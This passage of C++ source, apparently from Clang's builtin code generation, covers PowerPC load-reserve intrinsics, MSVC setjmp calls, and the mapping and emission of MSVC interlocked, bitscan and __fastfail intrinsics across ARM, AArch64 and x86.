break;
}
if (NewByte)
CGF.Builder.CreateStore(NewByte, ByteAddr);
}
// However we loaded the old byte, either by plain load or atomicrmw, shift
// the bit into the low position and mask it to 0 or 1.
Value *ShiftedByte = CGF.Builder.CreateLShr(OldByte, PosLow, "bittest.shr");
return CGF.Builder.CreateAnd(
ShiftedByte, llvm::ConstantInt::get(CGF.Int8Ty, 1), "bittest.res");
}
static llvm::Value *emitPPCLoadReserveIntrinsic(CodeGenFunction &CGF,
unsigned BuiltinID,
const CallExpr *E) {
Value *Addr = CGF.EmitScalarExpr(E->getArg(0));
SmallString<64> Asm;
raw_svector_ostream AsmOS(Asm);
llvm::IntegerType *RetType = CGF.Int32Ty;
switch (BuiltinID) {
case clang::PPC::BI__builtin_ppc_ldarx:
AsmOS << "ldarx ";
RetType = CGF.Int64Ty;
break;
case clang::PPC::BI__builtin_ppc_lwarx:
AsmOS << "lwarx ";
RetType = CGF.Int32Ty;
break;
case clang::PPC::BI__builtin_ppc_lharx:
AsmOS << "lharx ";
RetType = CGF.Int16Ty;
break;
case clang::PPC::BI__builtin_ppc_lbarx:
AsmOS << "lbarx ";
RetType = CGF.Int8Ty;
break;
default:
llvm_unreachable("Expected only PowerPC load reserve intrinsics");
}
AsmOS << "$0, ${1:y}";
std::string Constraints = "=r,*Z,~{memory}";
std::string MachineClobbers = CGF.getTarget().getClobbers();
if (!MachineClobbers.empty()) {
Constraints += ',';
Constraints += MachineClobbers;
}
llvm::Type *IntPtrType = RetType->getPointerTo();
llvm::FunctionType *FTy =
llvm::FunctionType::get(RetType, {IntPtrType}, false);
llvm::InlineAsm *IA =
llvm::InlineAsm::get(FTy, Asm, Constraints, /*hasSideEffects=*/true);
return CGF.Builder.CreateCall(IA, {Addr});
}
namespace {
enum class MSVCSetJmpKind {
_setjmpex,
_setjmp3,
_setjmp
};
}
/// MSVC handles setjmp a bit differently on different platforms. On every
/// architecture except 32-bit x86, the frame address is passed. On x86, extra
/// parameters can be passed as variadic arguments, but we always pass none.
static RValue EmitMSVCRTSetJmp(CodeGenFunction &CGF, MSVCSetJmpKind SJKind,
const CallExpr *E) {
llvm::Value *Arg1 = nullptr;
llvm::Type *Arg1Ty = nullptr;
StringRef Name;
bool IsVarArg = false;
if (SJKind == MSVCSetJmpKind::_setjmp3) {
Name = "_setjmp3";
Arg1Ty = CGF.Int32Ty;
Arg1 = llvm::ConstantInt::get(CGF.IntTy, 0);
IsVarArg = true;
} else {
Name = SJKind == MSVCSetJmpKind::_setjmp ? "_setjmp" : "_setjmpex";
Arg1Ty = CGF.Int8PtrTy;
if (CGF.getTarget().getTriple().getArch() == llvm::Triple::aarch64) {
Arg1 = CGF.Builder.CreateCall(
CGF.CGM.getIntrinsic(Intrinsic::sponentry, CGF.AllocaInt8PtrTy));
} else
Arg1 = CGF.Builder.CreateCall(
CGF.CGM.getIntrinsic(Intrinsic::frameaddress, CGF.AllocaInt8PtrTy),
llvm::ConstantInt::get(CGF.Int32Ty, 0));
}
// Mark the call site and declaration with ReturnsTwice.
llvm::Type *ArgTypes[2] = {CGF.Int8PtrTy, Arg1Ty};
llvm::AttributeList ReturnsTwiceAttr = llvm::AttributeList::get(
CGF.getLLVMContext(), llvm::AttributeList::FunctionIndex,
llvm::Attribute::ReturnsTwice);
llvm::FunctionCallee SetJmpFn = CGF.CGM.CreateRuntimeFunction(
llvm::FunctionType::get(CGF.IntTy, ArgTypes, IsVarArg), Name,
ReturnsTwiceAttr, /*Local=*/true);
llvm::Value *Buf = CGF.Builder.CreateBitOrPointerCast(
CGF.EmitScalarExpr(E->getArg(0)), CGF.Int8PtrTy);
llvm::Value *Args[] = {Buf, Arg1};
llvm::CallBase *CB = CGF.EmitRuntimeCallOrInvoke(SetJmpFn, Args);
CB->setAttributes(ReturnsTwiceAttr);
return RValue::get(CB);
}
// Many of the MSVC builtins are available on x64, ARM and AArch64; to avoid
// repeating code, we handle them here.
enum class CodeGenFunction::MSVCIntrin {
_BitScanForward,
_BitScanReverse,
_InterlockedAnd,
_InterlockedDecrement,
_InterlockedExchange,
_InterlockedExchangeAdd,
_InterlockedExchangeSub,
_InterlockedIncrement,
_InterlockedOr,
_InterlockedXor,
_InterlockedExchangeAdd_acq,
_InterlockedExchangeAdd_rel,
_InterlockedExchangeAdd_nf,
_InterlockedExchange_acq,
_InterlockedExchange_rel,
_InterlockedExchange_nf,
_InterlockedCompareExchange_acq,
_InterlockedCompareExchange_rel,
_InterlockedCompareExchange_nf,
_InterlockedCompareExchange128,
_InterlockedCompareExchange128_acq,
_InterlockedCompareExchange128_rel,
_InterlockedCompareExchange128_nf,
_InterlockedOr_acq,
_InterlockedOr_rel,
_InterlockedOr_nf,
_InterlockedXor_acq,
_InterlockedXor_rel,
_InterlockedXor_nf,
_InterlockedAnd_acq,
_InterlockedAnd_rel,
_InterlockedAnd_nf,
_InterlockedIncrement_acq,
_InterlockedIncrement_rel,
_InterlockedIncrement_nf,
_InterlockedDecrement_acq,
_InterlockedDecrement_rel,
_InterlockedDecrement_nf,
__fastfail,
};
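// Map an ARM-specific MSVC interlocked/bitscan builtin ID to the
// architecture-neutral MSVCIntrin enumerator, or None if there is no mapping.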
static Optional<CodeGenFunction::MSVCIntrin>
translateArmToMsvcIntrin(unsigned BuiltinID) {
using MSVCIntrin = CodeGenFunction::MSVCIntrin;
switch (BuiltinID) {
default:
return None;
case ARM::BI_BitScanForward:
case ARM::BI_BitScanForward64:
return MSVCIntrin::_BitScanForward;
case ARM::BI_BitScanReverse:
case ARM::BI_BitScanReverse64:
return MSVCIntrin::_BitScanReverse;
case ARM::BI_InterlockedAnd64:
return MSVCIntrin::_InterlockedAnd;
case ARM::BI_InterlockedExchange64:
return MSVCIntrin::_InterlockedExchange;
case ARM::BI_InterlockedExchangeAdd64:
return MSVCIntrin::_InterlockedExchangeAdd;
case ARM::BI_InterlockedExchangeSub64:
return MSVCIntrin::_InterlockedExchangeSub;
case ARM::BI_InterlockedOr64:
return MSVCIntrin::_InterlockedOr;
case ARM::BI_InterlockedXor64:
return MSVCIntrin::_InterlockedXor;
case ARM::BI_InterlockedDecrement64:
return MSVCIntrin::_InterlockedDecrement;
case ARM::BI_InterlockedIncrement64:
return MSVCIntrin::_InterlockedIncrement;
case ARM::BI_InterlockedExchangeAdd8_acq:
case ARM::BI_InterlockedExchangeAdd16_acq:
case ARM::BI_InterlockedExchangeAdd_acq:
case ARM::BI_InterlockedExchangeAdd64_acq:
return MSVCIntrin::_InterlockedExchangeAdd_acq;
case ARM::BI_InterlockedExchangeAdd8_rel:
case ARM::BI_InterlockedExchangeAdd16_rel:
case ARM::BI_InterlockedExchangeAdd_rel:
case ARM::BI_InterlockedExchangeAdd64_rel:
return MSVCIntrin::_InterlockedExchangeAdd_rel;
case ARM::BI_InterlockedExchangeAdd8_nf:
case ARM::BI_InterlockedExchangeAdd16_nf:
case ARM::BI_InterlockedExchangeAdd_nf:
case ARM::BI_InterlockedExchangeAdd64_nf:
return MSVCIntrin::_InterlockedExchangeAdd_nf;
case ARM::BI_InterlockedExchange8_acq:
case ARM::BI_InterlockedExchange16_acq:
case ARM::BI_InterlockedExchange_acq:
case ARM::BI_InterlockedExchange64_acq:
return MSVCIntrin::_InterlockedExchange_acq;
case ARM::BI_InterlockedExchange8_rel:
case ARM::BI_InterlockedExchange16_rel:
case ARM::BI_InterlockedExchange_rel:
case ARM::BI_InterlockedExchange64_rel:
return MSVCIntrin::_InterlockedExchange_rel;
case ARM::BI_InterlockedExchange8_nf:
case ARM::BI_InterlockedExchange16_nf:
case ARM::BI_InterlockedExchange_nf:
case ARM::BI_InterlockedExchange64_nf:
return MSVCIntrin::_InterlockedExchange_nf;
case ARM::BI_InterlockedCompareExchange8_acq:
case ARM::BI_InterlockedCompareExchange16_acq:
case ARM::BI_InterlockedCompareExchange_acq:
case ARM::BI_InterlockedCompareExchange64_acq:
return MSVCIntrin::_InterlockedCompareExchange_acq;
case ARM::BI_InterlockedCompareExchange8_rel:
case ARM::BI_InterlockedCompareExchange16_rel:
case ARM::BI_InterlockedCompareExchange_rel:
case ARM::BI_InterlockedCompareExchange64_rel:
return MSVCIntrin::_InterlockedCompareExchange_rel;
case ARM::BI_InterlockedCompareExchange8_nf:
case ARM::BI_InterlockedCompareExchange16_nf:
case ARM::BI_InterlockedCompareExchange_nf:
case ARM::BI_InterlockedCompareExchange64_nf:
return MSVCIntrin::_InterlockedCompareExchange_nf;
case ARM::BI_InterlockedOr8_acq:
case ARM::BI_InterlockedOr16_acq:
case ARM::BI_InterlockedOr_acq:
case ARM::BI_InterlockedOr64_acq:
return MSVCIntrin::_InterlockedOr_acq;
case ARM::BI_InterlockedOr8_rel:
case ARM::BI_InterlockedOr16_rel:
case ARM::BI_InterlockedOr_rel:
case ARM::BI_InterlockedOr64_rel:
return MSVCIntrin::_InterlockedOr_rel;
case ARM::BI_InterlockedOr8_nf:
case ARM::BI_InterlockedOr16_nf:
case ARM::BI_InterlockedOr_nf:
case ARM::BI_InterlockedOr64_nf:
return MSVCIntrin::_InterlockedOr_nf;
case ARM::BI_InterlockedXor8_acq:
case ARM::BI_InterlockedXor16_acq:
case ARM::BI_InterlockedXor_acq:
case ARM::BI_InterlockedXor64_acq:
return MSVCIntrin::_InterlockedXor_acq;
case ARM::BI_InterlockedXor8_rel:
case ARM::BI_InterlockedXor16_rel:
case ARM::BI_InterlockedXor_rel:
case ARM::BI_InterlockedXor64_rel:
return MSVCIntrin::_InterlockedXor_rel;
case ARM::BI_InterlockedXor8_nf:
case ARM::BI_InterlockedXor16_nf:
case ARM::BI_InterlockedXor_nf:
case ARM::BI_InterlockedXor64_nf:
return MSVCIntrin::_InterlockedXor_nf;
case ARM::BI_InterlockedAnd8_acq:
case ARM::BI_InterlockedAnd16_acq:
case ARM::BI_InterlockedAnd_acq:
case ARM::BI_InterlockedAnd64_acq:
return MSVCIntrin::_InterlockedAnd_acq;
case ARM::BI_InterlockedAnd8_rel:
case ARM::BI_InterlockedAnd16_rel:
case ARM::BI_InterlockedAnd_rel:
case ARM::BI_InterlockedAnd64_rel:
return MSVCIntrin::_InterlockedAnd_rel;
case ARM::BI_InterlockedAnd8_nf:
case ARM::BI_InterlockedAnd16_nf:
case ARM::BI_InterlockedAnd_nf:
case ARM::BI_InterlockedAnd64_nf:
return MSVCIntrin::_InterlockedAnd_nf;
case ARM::BI_InterlockedIncrement16_acq:
case ARM::BI_InterlockedIncrement_acq:
case ARM::BI_InterlockedIncrement64_acq:
return MSVCIntrin::_InterlockedIncrement_acq;
case ARM::BI_InterlockedIncrement16_rel:
case ARM::BI_InterlockedIncrement_rel:
case ARM::BI_InterlockedIncrement64_rel:
return MSVCIntrin::_InterlockedIncrement_rel;
case ARM::BI_InterlockedIncrement16_nf:
case ARM::BI_InterlockedIncrement_nf:
case ARM::BI_InterlockedIncrement64_nf:
return MSVCIntrin::_InterlockedIncrement_nf;
case ARM::BI_InterlockedDecrement16_acq:
case ARM::BI_InterlockedDecrement_acq:
case ARM::BI_InterlockedDecrement64_acq:
return MSVCIntrin::_InterlockedDecrement_acq;
case ARM::BI_InterlockedDecrement16_rel:
case ARM::BI_InterlockedDecrement_rel:
case ARM::BI_InterlockedDecrement64_rel:
return MSVCIntrin::_InterlockedDecrement_rel;
case ARM::BI_InterlockedDecrement16_nf:
case ARM::BI_InterlockedDecrement_nf:
case ARM::BI_InterlockedDecrement64_nf:
return MSVCIntrin::_InterlockedDecrement_nf;
}
llvm_unreachable("must return from switch");
}
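// Map an AArch64-specific MSVC interlocked/bitscan builtin ID to the
// architecture-neutral MSVCIntrin enumerator, or None if there is no mapping.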
static Optional<CodeGenFunction::MSVCIntrin>
translateAarch64ToMsvcIntrin(unsigned BuiltinID) {
using MSVCIntrin = CodeGenFunction::MSVCIntrin;
switch (BuiltinID) {
default:
return None;
case AArch64::BI_BitScanForward:
case AArch64::BI_BitScanForward64:
return MSVCIntrin::_BitScanForward;
case AArch64::BI_BitScanReverse:
case AArch64::BI_BitScanReverse64:
return MSVCIntrin::_BitScanReverse;
case AArch64::BI_InterlockedAnd64:
return MSVCIntrin::_InterlockedAnd;
case AArch64::BI_InterlockedExchange64:
return MSVCIntrin::_InterlockedExchange;
case AArch64::BI_InterlockedExchangeAdd64:
return MSVCIntrin::_InterlockedExchangeAdd;
case AArch64::BI_InterlockedExchangeSub64:
return MSVCIntrin::_InterlockedExchangeSub;
case AArch64::BI_InterlockedOr64:
return MSVCIntrin::_InterlockedOr;
case AArch64::BI_InterlockedXor64:
return MSVCIntrin::_InterlockedXor;
case AArch64::BI_InterlockedDecrement64:
return MSVCIntrin::_InterlockedDecrement;
case AArch64::BI_InterlockedIncrement64:
return MSVCIntrin::_InterlockedIncrement;
case AArch64::BI_InterlockedExchangeAdd8_acq:
case AArch64::BI_InterlockedExchangeAdd16_acq:
case AArch64::BI_InterlockedExchangeAdd_acq:
case AArch64::BI_InterlockedExchangeAdd64_acq:
return MSVCIntrin::_InterlockedExchangeAdd_acq;
case AArch64::BI_InterlockedExchangeAdd8_rel:
case AArch64::BI_InterlockedExchangeAdd16_rel:
case AArch64::BI_InterlockedExchangeAdd_rel:
case AArch64::BI_InterlockedExchangeAdd64_rel:
return MSVCIntrin::_InterlockedExchangeAdd_rel;
case AArch64::BI_InterlockedExchangeAdd8_nf:
case AArch64::BI_InterlockedExchangeAdd16_nf:
case AArch64::BI_InterlockedExchangeAdd_nf:
case AArch64::BI_InterlockedExchangeAdd64_nf:
return MSVCIntrin::_InterlockedExchangeAdd_nf;
case AArch64::BI_InterlockedExchange8_acq:
case AArch64::BI_InterlockedExchange16_acq:
case AArch64::BI_InterlockedExchange_acq:
case AArch64::BI_InterlockedExchange64_acq:
return MSVCIntrin::_InterlockedExchange_acq;
case AArch64::BI_InterlockedExchange8_rel:
case AArch64::BI_InterlockedExchange16_rel:
case AArch64::BI_InterlockedExchange_rel:
case AArch64::BI_InterlockedExchange64_rel:
return MSVCIntrin::_InterlockedExchange_rel;
case AArch64::BI_InterlockedExchange8_nf:
case AArch64::BI_InterlockedExchange16_nf:
case AArch64::BI_InterlockedExchange_nf:
case AArch64::BI_InterlockedExchange64_nf:
return MSVCIntrin::_InterlockedExchange_nf;
case AArch64::BI_InterlockedCompareExchange8_acq:
case AArch64::BI_InterlockedCompareExchange16_acq:
case AArch64::BI_InterlockedCompareExchange_acq:
case AArch64::BI_InterlockedCompareExchange64_acq:
return MSVCIntrin::_InterlockedCompareExchange_acq;
case AArch64::BI_InterlockedCompareExchange8_rel:
case AArch64::BI_InterlockedCompareExchange16_rel:
case AArch64::BI_InterlockedCompareExchange_rel:
case AArch64::BI_InterlockedCompareExchange64_rel:
return MSVCIntrin::_InterlockedCompareExchange_rel;
case AArch64::BI_InterlockedCompareExchange8_nf:
case AArch64::BI_InterlockedCompareExchange16_nf:
case AArch64::BI_InterlockedCompareExchange_nf:
case AArch64::BI_InterlockedCompareExchange64_nf:
return MSVCIntrin::_InterlockedCompareExchange_nf;
case AArch64::BI_InterlockedCompareExchange128:
return MSVCIntrin::_InterlockedCompareExchange128;
case AArch64::BI_InterlockedCompareExchange128_acq:
return MSVCIntrin::_InterlockedCompareExchange128_acq;
case AArch64::BI_InterlockedCompareExchange128_nf:
return MSVCIntrin::_InterlockedCompareExchange128_nf;
case AArch64::BI_InterlockedCompareExchange128_rel:
return MSVCIntrin::_InterlockedCompareExchange128_rel;
case AArch64::BI_InterlockedOr8_acq:
case AArch64::BI_InterlockedOr16_acq:
case AArch64::BI_InterlockedOr_acq:
case AArch64::BI_InterlockedOr64_acq:
return MSVCIntrin::_InterlockedOr_acq;
case AArch64::BI_InterlockedOr8_rel:
case AArch64::BI_InterlockedOr16_rel:
case AArch64::BI_InterlockedOr_rel:
case AArch64::BI_InterlockedOr64_rel:
return MSVCIntrin::_InterlockedOr_rel;
case AArch64::BI_InterlockedOr8_nf:
case AArch64::BI_InterlockedOr16_nf:
case AArch64::BI_InterlockedOr_nf:
case AArch64::BI_InterlockedOr64_nf:
return MSVCIntrin::_InterlockedOr_nf;
case AArch64::BI_InterlockedXor8_acq:
case AArch64::BI_InterlockedXor16_acq:
case AArch64::BI_InterlockedXor_acq:
case AArch64::BI_InterlockedXor64_acq:
return MSVCIntrin::_InterlockedXor_acq;
case AArch64::BI_InterlockedXor8_rel:
case AArch64::BI_InterlockedXor16_rel:
case AArch64::BI_InterlockedXor_rel:
case AArch64::BI_InterlockedXor64_rel:
return MSVCIntrin::_InterlockedXor_rel;
case AArch64::BI_InterlockedXor8_nf:
case AArch64::BI_InterlockedXor16_nf:
case AArch64::BI_InterlockedXor_nf:
case AArch64::BI_InterlockedXor64_nf:
return MSVCIntrin::_InterlockedXor_nf;
case AArch64::BI_InterlockedAnd8_acq:
case AArch64::BI_InterlockedAnd16_acq:
case AArch64::BI_InterlockedAnd_acq:
case AArch64::BI_InterlockedAnd64_acq:
return MSVCIntrin::_InterlockedAnd_acq;
case AArch64::BI_InterlockedAnd8_rel:
case AArch64::BI_InterlockedAnd16_rel:
case AArch64::BI_InterlockedAnd_rel:
case AArch64::BI_InterlockedAnd64_rel:
return MSVCIntrin::_InterlockedAnd_rel;
case AArch64::BI_InterlockedAnd8_nf:
case AArch64::BI_InterlockedAnd16_nf:
case AArch64::BI_InterlockedAnd_nf:
case AArch64::BI_InterlockedAnd64_nf:
return MSVCIntrin::_InterlockedAnd_nf;
case AArch64::BI_InterlockedIncrement16_acq:
case AArch64::BI_InterlockedIncrement_acq:
case AArch64::BI_InterlockedIncrement64_acq:
return MSVCIntrin::_InterlockedIncrement_acq;
case AArch64::BI_InterlockedIncrement16_rel:
case AArch64::BI_InterlockedIncrement_rel:
case AArch64::BI_InterlockedIncrement64_rel:
return MSVCIntrin::_InterlockedIncrement_rel;
case AArch64::BI_InterlockedIncrement16_nf:
case AArch64::BI_InterlockedIncrement_nf:
case AArch64::BI_InterlockedIncrement64_nf:
return MSVCIntrin::_InterlockedIncrement_nf;
case AArch64::BI_InterlockedDecrement16_acq:
case AArch64::BI_InterlockedDecrement_acq:
case AArch64::BI_InterlockedDecrement64_acq:
return MSVCIntrin::_InterlockedDecrement_acq;
case AArch64::BI_InterlockedDecrement16_rel:
case AArch64::BI_InterlockedDecrement_rel:
case AArch64::BI_InterlockedDecrement64_rel:
return MSVCIntrin::_InterlockedDecrement_rel;
case AArch64::BI_InterlockedDecrement16_nf:
case AArch64::BI_InterlockedDecrement_nf:
case AArch64::BI_InterlockedDecrement64_nf:
return MSVCIntrin::_InterlockedDecrement_nf;
}
llvm_unreachable("must return from switch");
}
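// Map an x86-specific MSVC interlocked/bitscan builtin ID to the
// architecture-neutral MSVCIntrin enumerator, or None if there is no mapping.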
static Optional<CodeGenFunction::MSVCIntrin>
translateX86ToMsvcIntrin(unsigned BuiltinID) {
using MSVCIntrin = CodeGenFunction::MSVCIntrin;
switch (BuiltinID) {
default:
return None;
case clang::X86::BI_BitScanForward:
case clang::X86::BI_BitScanForward64:
return MSVCIntrin::_BitScanForward;
case clang::X86::BI_BitScanReverse:
case clang::X86::BI_BitScanReverse64:
return MSVCIntrin::_BitScanReverse;
case clang::X86::BI_InterlockedAnd64:
return MSVCIntrin::_InterlockedAnd;
case clang::X86::BI_InterlockedCompareExchange128:
return MSVCIntrin::_InterlockedCompareExchange128;
case clang::X86::BI_InterlockedExchange64:
return MSVCIntrin::_InterlockedExchange;
case clang::X86::BI_InterlockedExchangeAdd64:
return MSVCIntrin::_InterlockedExchangeAdd;
case clang::X86::BI_InterlockedExchangeSub64:
return MSVCIntrin::_InterlockedExchangeSub;
case clang::X86::BI_InterlockedOr64:
return MSVCIntrin::_InterlockedOr;
case clang::X86::BI_InterlockedXor64:
return MSVCIntrin::_InterlockedXor;
case clang::X86::BI_InterlockedDecrement64:
return MSVCIntrin::_InterlockedDecrement;
case clang::X86::BI_InterlockedIncrement64:
return MSVCIntrin::_InterlockedIncrement;
}
llvm_unreachable("must return from switch");
}
// Emit an MSVC intrinsic. Assumes that arguments have *not* been evaluated.
Value *CodeGenFunction::EmitMSVCBuiltinExpr(MSVCIntrin BuiltinID,
const CallExpr *E) {
switch (BuiltinID) {
case MSVCIntrin::_BitScanForward:
case MSVCIntrin::_BitScanReverse: {
Address IndexAddress(EmitPointerWithAlignment(E->getArg(0)));
Value *ArgValue = EmitScalarExpr(E->getArg(1));
llvm::Type *ArgType = ArgValue->getType();
llvm::Type *IndexType =
IndexAddress.getPointer()->getType()->getPointerElementType();
llvm::Type *ResultType = ConvertType(E->getType());
Value *ArgZero = llvm::Constant::getNullValue(ArgType);
Value *ResZero = llvm::Constant::getNullValue(ResultType);
Value *ResOne = llvm::ConstantInt::get(ResultType, 1);
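    // Control flow: Begin branches to End (result 0) when the argument is
    // zero; otherwise NotZero computes the bit index with cttz/ctlz, stores
    // it through the index pointer, and joins End with result 1.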
BasicBlock *Begin = Builder.GetInsertBlock();
BasicBlock *End = createBasicBlock("bitscan_end", this->CurFn);
Builder.SetInsertPoint(End);
PHINode *Result = Builder.CreatePHI(ResultType, 2, "bitscan_result");
Builder.SetInsertPoint(Begin);
Value *IsZero = Builder.CreateICmpEQ(ArgValue, ArgZero);
BasicBlock *NotZero = createBasicBlock("bitscan_not_zero", this->CurFn);
Builder.CreateCondBr(IsZero, End, NotZero);
Result->addIncoming(ResZero, Begin);
Builder.SetInsertPoint(NotZero);
if (BuiltinID == MSVCIntrin::_BitScanForward) {
Function *F = CGM.getIntrinsic(Intrinsic::cttz, ArgType);
Value *ZeroCount = Builder.CreateCall(F, {ArgValue, Builder.getTrue()});
ZeroCount = Builder.CreateIntCast(ZeroCount, IndexType, false);
Builder.CreateStore(ZeroCount, IndexAddress, false);
} else {
unsigned ArgWidth = cast<llvm::IntegerType>(ArgType)->getBitWidth();
Value *ArgTypeLastIndex = llvm::ConstantInt::get(IndexType, ArgWidth - 1);
Function *F = CGM.getIntrinsic(Intrinsic::ctlz, ArgType);
Value *ZeroCount = Builder.CreateCall(F, {ArgValue, Builder.getTrue()});
ZeroCount = Builder.CreateIntCast(ZeroCount, IndexType, false);
Value *Index = Builder.CreateNSWSub(ArgTypeLastIndex, ZeroCount);
Builder.CreateStore(Index, IndexAddress, false);
}
Builder.CreateBr(End);
Result->addIncoming(ResOne, NotZero);
Builder.SetInsertPoint(End);
return Result;
}
case MSVCIntrin::_InterlockedAnd:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::And, E);
case MSVCIntrin::_InterlockedExchange:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xchg, E);
case MSVCIntrin::_InterlockedExchangeAdd:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Add, E);
case MSVCIntrin::_InterlockedExchangeSub:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Sub, E);
case MSVCIntrin::_InterlockedOr:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Or, E);
case MSVCIntrin::_InterlockedXor:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xor, E);
case MSVCIntrin::_InterlockedExchangeAdd_acq:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Add, E,
AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedExchangeAdd_rel:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Add, E,
AtomicOrdering::Release);
case MSVCIntrin::_InterlockedExchangeAdd_nf:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Add, E,
AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedExchange_acq:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xchg, E,
AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedExchange_rel:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xchg, E,
AtomicOrdering::Release);
case MSVCIntrin::_InterlockedExchange_nf:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xchg, E,
AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedCompareExchange_acq:
return EmitAtomicCmpXchgForMSIntrin(*this, E, AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedCompareExchange_rel:
return EmitAtomicCmpXchgForMSIntrin(*this, E, AtomicOrdering::Release);
case MSVCIntrin::_InterlockedCompareExchange_nf:
return EmitAtomicCmpXchgForMSIntrin(*this, E, AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedCompareExchange128:
return EmitAtomicCmpXchg128ForMSIntrin(
*this, E, AtomicOrdering::SequentiallyConsistent);
case MSVCIntrin::_InterlockedCompareExchange128_acq:
return EmitAtomicCmpXchg128ForMSIntrin(*this, E, AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedCompareExchange128_rel:
return EmitAtomicCmpXchg128ForMSIntrin(*this, E, AtomicOrdering::Release);
case MSVCIntrin::_InterlockedCompareExchange128_nf:
return EmitAtomicCmpXchg128ForMSIntrin(*this, E, AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedOr_acq:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Or, E,
AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedOr_rel:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Or, E,
AtomicOrdering::Release);
case MSVCIntrin::_InterlockedOr_nf:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Or, E,
AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedXor_acq:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xor, E,
AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedXor_rel:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xor, E,
AtomicOrdering::Release);
case MSVCIntrin::_InterlockedXor_nf:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xor, E,
AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedAnd_acq:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::And, E,
AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedAnd_rel:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::And, E,
AtomicOrdering::Release);
case MSVCIntrin::_InterlockedAnd_nf:
return MakeBinaryAtomicValue(*this, AtomicRMWInst::And, E,
AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedIncrement_acq:
return EmitAtomicIncrementValue(*this, E, AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedIncrement_rel:
return EmitAtomicIncrementValue(*this, E, AtomicOrdering::Release);
case MSVCIntrin::_InterlockedIncrement_nf:
return EmitAtomicIncrementValue(*this, E, AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedDecrement_acq:
return EmitAtomicDecrementValue(*this, E, AtomicOrdering::Acquire);
case MSVCIntrin::_InterlockedDecrement_rel:
return EmitAtomicDecrementValue(*this, E, AtomicOrdering::Release);
case MSVCIntrin::_InterlockedDecrement_nf:
return EmitAtomicDecrementValue(*this, E, AtomicOrdering::Monotonic);
case MSVCIntrin::_InterlockedDecrement:
return EmitAtomicDecrementValue(*this, E);
case MSVCIntrin::_InterlockedIncrement:
return EmitAtomicIncrementValue(*this, E);
case MSVCIntrin::__fastfail: {
// Request immediate process termination from the kernel. The instruction
// sequences to do this are documented on MSDN:
// https://msdn.microsoft.com/en-us/library/dn774154.aspx
llvm::Triple::ArchType ISA = getTarget().getTriple().getArch();
StringRef Asm, Constraints;
switch (ISA) {
default:
ErrorUnsupported(E, "__fastfail call for this architecture");
break;
case llvm::Triple::x86:
case llvm::Triple::x86_64:
Asm = "int $$0x29";
Constraints = "{cx}";
break;
case llvm::Triple::thumb:
Asm = "udf #251";
Constraints = "{r0}";
break;
case llvm::Triple::aarch64:
Asm = "brk #0xF003";
Constraints = "{w0}";
}
llvm::FunctionType *FTy = llvm::FunctionType::get(VoidTy, {Int32Ty}, false);
llvm::InlineAsm *IA =
llvm::InlineAsm::get(FTy, Asm, Constraints, /*hasSideEffects=*/true);
llvm::AttributeList NoReturnAttr = llvm::AttributeList::get(
getLLVMContext(), llvm::AttributeList::FunctionIndex,
llvm::Attribute::NoReturn);
llvm::CallInst *CI = Builder.CreateCall(IA, EmitScalarExpr(E->getArg(0)));
CI->setAttributes(NoReturnAttr);
return CI;
}
}
llvm_unreachable("Incorrect MSVC intrinsic!");
}
namespace {
// ARC cleanup for __builtin_os_log_format
struct CallObjCArcUse final : EHScopeStack::Cleanup {
CallObjCArcUse(llvm::Value *object) : object(object) {}
llvm::Value *object;
void Emit(CodeGenFunction &CGF, Flags flags) override {
CGF.EmitARCIntrinsicUse(object);
}
};
}
Value *CodeGenFunction::EmitCheckedArgForBuiltin(const Expr *E,
BuiltinCheckKind Kind) {
assert((Kind == BCK_CLZPassedZero || Kind == BCK_CTZPassedZero)
&& "Unsupported builtin check kind");
Value *ArgValue = EmitScalarExpr(E);
if (!SanOpts.has(SanitizerKind::Builtin) || !getTarget().isCLZForZeroUndef())
return ArgValue;
SanitizerScope SanScope(this);
Value *Cond = Builder.CreateICmpNE(
ArgValue, llvm::Constant::getNullValue(ArgValue->getType()));
EmitCheck(std::make_pair(Cond, SanitizerKind::Builtin),
SanitizerHandler::InvalidBuiltin,
{EmitCheckSourceLocation(E->getExprLoc()),
llvm::ConstantInt::get(Builder.getInt8Ty(), Kind)},
None);
return ArgValue;
}
/// Get the argument type for arguments to os_log_helper.
static CanQualType getOSLogArgType(ASTContext &C, int Size) {
QualType UnsignedTy = C.getIntTypeForBitwidth(Size * 8, /*Signed=*/false);
return C.getCanonicalType(UnsignedTy);
}
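// Generate (or reuse) the os_log helper. The helper's name encodes the buffer
// alignment, the summary and numArgs bytes, and each item's size/descriptor
// bytes (e.g. a hypothetical "__os_log_helper_4_2_1_8_34"), so call sites
// with identical layouts share a single linkonce_odr definition.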
